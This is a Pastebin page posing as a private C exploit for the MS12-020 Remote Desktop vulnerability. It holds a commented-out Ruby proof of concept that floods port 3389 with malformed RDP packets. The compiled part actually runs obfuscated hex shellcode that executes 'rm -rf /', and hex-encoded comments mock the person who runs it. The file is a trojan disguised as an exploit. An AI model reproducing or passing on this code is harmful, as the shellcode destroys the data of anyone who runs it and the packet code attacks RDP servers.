SHARE
TWEET

ms12-020_PRIVATE.c

a guest Mar 16th, 2012 417 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. ## ms12-020.c
  2. # change offset in main before compiling
  3. # 64bit shellcode available soon
  4. /*
  5. require 'socket'
  6.  
  7. def send_tpkt(sd, data)
  8.   sd.write(make_tpkt(data))
  9. end
  10.  
  11. def make_tpkt(data)
  12.   [
  13.     3,  # version
  14.     0,  # reserved
  15.     4 + data.length
  16.   ].pack('CCn') + data
  17. end
  18.  
  19. def make_x224(data)
  20.   [ data.length ].pack('C') + data
  21. end
  22.  
  23. def make_rdp(type, flags, data)
  24.   [ type, flags, 4 + data.length ].pack('CCv') + data
  25. end
  26.  
  27. host = ARGV.shift
  28.  
  29. sd = TCPSocket.new(host, 3389)
  30. pkts1 = []
  31.  
  32. # craft connection request
  33. rdp = make_rdp(1, 0, [ 0 ].pack('V'))
  34. x224_1 = make_x224([
  35.   0xe0,  # Connection request
  36.   0,     # ??
  37.   0,     # SRC-REF
  38.   0      # Class : Class 0
  39. ].pack('CnnC') + rdp)
  40.  
  41. pkts1 << make_tpkt(x224_1)
  42.  
  43. # craft connect-initial
  44. x224_2 = make_x224([
  45.   0xf0,  # Data / Class 0
  46.   0x80   # EOT: True / NR: 0
  47. ].pack('CC'))
  48.  
  49. # mcsCi
  50. target_params = ""+
  51.   #"\x02\x01\x00"+     # maxChannelIds
  52.   "\x02\x01\x22"+  # maxChannelIds
  53.   "\x02\x01\x0a"+  # maxUserIds
  54.   "\x02\x01\x00"+  # maxTokenIds
  55.   "\x02\x01\x01"+  # numPriorities
  56.   "\x02\x01\x00"+  # minThroughput
  57.   "\x02\x01\x01"+  # maxHeight
  58.   "\x02\x02\xff\xff"+          # maxMCSPDUSize
  59.   "\x02\x01\x02"   # protocolVersion
  60. min_params = ""+
  61.   "\x02\x01\x01"+  # maxChannelIds
  62.   "\x02\x01\x01"+  # maxUserIds
  63.   "\x02\x01\x01"+  # maxTokenIds
  64.   "\x02\x01\x01"+  # numPriorities
  65.   "\x02\x01\x00"+  # minThroughput
  66.   "\x02\x01\x01"+  # maxHeight
  67.   "\x02\x02\x04\x20"+          # maxMCSPDUSize
  68.   "\x02\x01\x02"   # protocolVersion
  69. max_params = ""+
  70.   "\x02\x02\xff\xff"+          # maxChannelIds
  71.   "\x02\x02\xfc\x17"+          # maxUserIds
  72.   "\x02\x02\xff\xff"+          # maxTokenIds
  73.   "\x02\x01\x01"+  # numPriorities
  74.   "\x02\x01\x00"+  # minThroughput
  75.   "\x02\x01\x01"+  # maxHeight
  76.   "\x02\x02\xff\xff"+          # maxMCSPDUSize
  77.   "\x02\x01\x02"   # protocolVersion
  78.  
  79. userdata = ""+
  80.   # gccCCrq
  81.   "\x00\x05\x00\x14"+
  82.   "\x7c\x00\x01\x81\x2a\x00\x08\x00\x10\x00\x01\xc0\x00\x44\x75\x63"+"\x61\x81\x1c"+
  83.   # clientCoreData
  84.   "\x01\xc0"+"\xd8\x00"+  # header (type, len)
  85.     "\x04\x00"+"\x08\x00"+ # version
  86.     "\x80\x02"+ # desktop width
  87.     "\xe0\x01"+ # desktop height
  88.     "\x01\xca"+ # color depth
  89.     "\x03\xaa"+ # SASSequence
  90.     "\x09\x04\x00\x00" + # keyboard layout
  91.     "\xce\x0e\x00\x00" + # client build number
  92.     # client name
  93.     "\x48\x00\x4f\x00\x53\x00\x54\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
  94.     "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
  95.     "\x04\x00\x00\x00"+ # keyboard type
  96.     "\x00\x00\x00\x00"+ # kbd subType
  97.     "\x0c\x00\x00\x00"+ # kbd FuncKey
  98.     # imeFileName
  99.     "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
  100.     "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
  101.     "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
  102.     "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
  103.     "\x01\xca"+ # postBeta2ColorDepth
  104.     "\x01\x00"+ # clientProductId
  105.     "\x00\x00\x00\x00" + # serialNumber
  106.     "\x10\x00"+ # highColorDepth
  107.     "\x07\x00"+ # supportedColorDepths
  108.     "\x01\x00"+ # earlyCapabilityFlags
  109.     # clientDigProductId -poc has: "00000-000-0000000-00000"
  110.     "\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\x2d\x00\x30\x00\x30\x00"+
  111.     "\x30\x00\x2d\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00"+
  112.     "\x30\x00\x2d\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\x00\x00"+
  113.     "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
  114.     "\x00"+ # connectionType
  115.     "\x00"+ # pad1octet
  116.     "\x00\x00\x00\x00"+ # serverSelectedProtocol
  117.     "\x04\xc0\x0c\x00"+ # desktopPhysicalWidth
  118.     "\x0d\x00\x00\x00"+ # desktopPhysicalHeight
  119.     "\x00\x00\x00\x00"+ # reserved
  120.   # clientSecurityData
  121.   "\x02\xc0"+"\x0c\x00"+ # header (type, len)
  122.     "\x1b\x00\x00\x00"+ # encryptionMethods
  123.     "\x00\x00\x00\x00"+ # extEncryptionMethods
  124.   # clientNetworkData
  125.   "\x03\xc0"+"\x2c\x00"+ # header (type, len)
  126.     "\x03\x00\x00\x00"+ # channel count!
  127.     # channel 0
  128.     "rdpdr\x00\x00\x00"+ # name
  129.     "\x00\x00\x80\x80"+  # options
  130.     # channel 1
  131.     "cliprdr\x00"+       # name
  132.     "\x00\x00\xa0\xc0"+  # options
  133.     # channel 2
  134.     "rdpsnd\x00\x00"+    # name
  135.     "\x00\x00\x00\xc0"   # options
  136.   # clientClusterData (not present)
  137.   # clientMonitorData (not present)
  138.  
  139. mcs_data = ""+
  140.     "\x04\x01\x01"+ # callingDomainSelector
  141.     "\x04\x01\x01"+ # calledDomainSelector
  142.     "\x01\x01\xff"+ # upwardFlag
  143.   "\x30" + [ target_params.length ].pack('C') + target_params +
  144.   "\x30\x41\x41" + [ min_params.length ].pack('C') + min_params +
  145.   "\x30" + [ max_params.length ].pack('C') + max_params +
  146.   # userData
  147.   "\x04\x82" + [ userdata.length ].pack('n') + userdata
  148.  
  149. mcs = "\x7f\x65\x82" + [ mcs_data.length ].pack('n')  # connect-initial (0x65 / 101), length
  150. mcs << mcs_data
  151.  
  152. pkts1 << make_tpkt(x224_2 + mcs)
  153.  
  154. # send a special one?
  155. #pkts1 << &nerf <<*zarfoo << make_tpkt(x224_2 + "\x04\x01\x00\x01\x00")
  156.  
  157. # send more pkts! - based on poc
  158. 8.times {
  159.   pkts1 << make_tpkt(x224_2 + "\x28")
  160. }
  161.  
  162. #pkts1 << make_tpkt(x224_2 + "\x38\x00\x06\x03\xea")
  163. #pkts1 << make_tpkt(x224_2 + "\x38\x00\x06\x03\xeb")
  164. #pkts1 << make_tpkt(x224_2 + "\x38\x00\x06\x03\xec")
  165. #pkts1 << make_tpkt(x224_2 + "\x38\x00\x06\x03\xed")
  166. #pkts1 << make_tpkt(x224_2 + "\x38\x00\x06\x03\xee")
  167. pkts1 << make_tpkt(x224_2 + "\x38\x00\x06\x03\xf0")
  168. #pkts1 << make_tpkt(x224_2 + "\x38\x00\x06\x03\xf1")
  169. #pkts1 << make_tpkt(x224_2 + "\x38\x00\x06\x03\xf2")
  170. #pkts1 << make_tpkt(x224_2 + "\x38\x00\x06\x03\xf3")
  171.  
  172. pkts1 << make_tpkt(x224_2 + "\x21\x80")
  173.  
  174. bigpkt = pkts1.join('')
  175.  
  176. 20.times { |x|
  177.   puts "[*] Sending #{x + 1} ..."
  178.   sd.write(bigpkt)
  179.  
  180.   send_tpkt(sd, x224_2 + "\x2e\x00\x00\x01")
  181.   #send_tpkt(sd, x224_2 + "\x2e\x00\x00\x02")
  182.   #send_tpkt(sd, x224_2 + "\x2e\x00\x00\x03")
  183.   #send_tpkt(sd, x224_2 + "\x2e\x00\x00\x04")
  184.  
  185.   # read connect-initial response
  186.   buf = sd.recv(1500)
  187.   # XXX: TODO: check response =)
  188.   #puts buf
  189. }
  190.  
  191. sd.close
  192. */
  193.  
  194. #\x64\x69\x65\x20\x73\x6b\x69\x64\x64\x69\x65\x20\x73\x63\x75\x6d
  195. #\x65\x6e\x6a\x6f\x79\x20\x79\x6f\x75\x72\x20\x72\x6d
  196. main()
  197. {
  198.        char shellcode[] =
  199.                "\x6a\x0b\x58\x99\x52\x6a\x2f\x89\xe7\x52\x66\x68\x2d\x66\x89"
  200.                "\xe6\x52\x66\x68\x2d\x72\x89\xe1\x52\x68\x2f\x2f\x72\x6d\x68"
  201.                "\x2f\x62\x69\x6e\x89\xe3\x52\x57\x56\x51\x53\x89\xe1\xcd\x80";
  202.  
  203.        (*(void (*)()) shellcode)();
  204. }
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top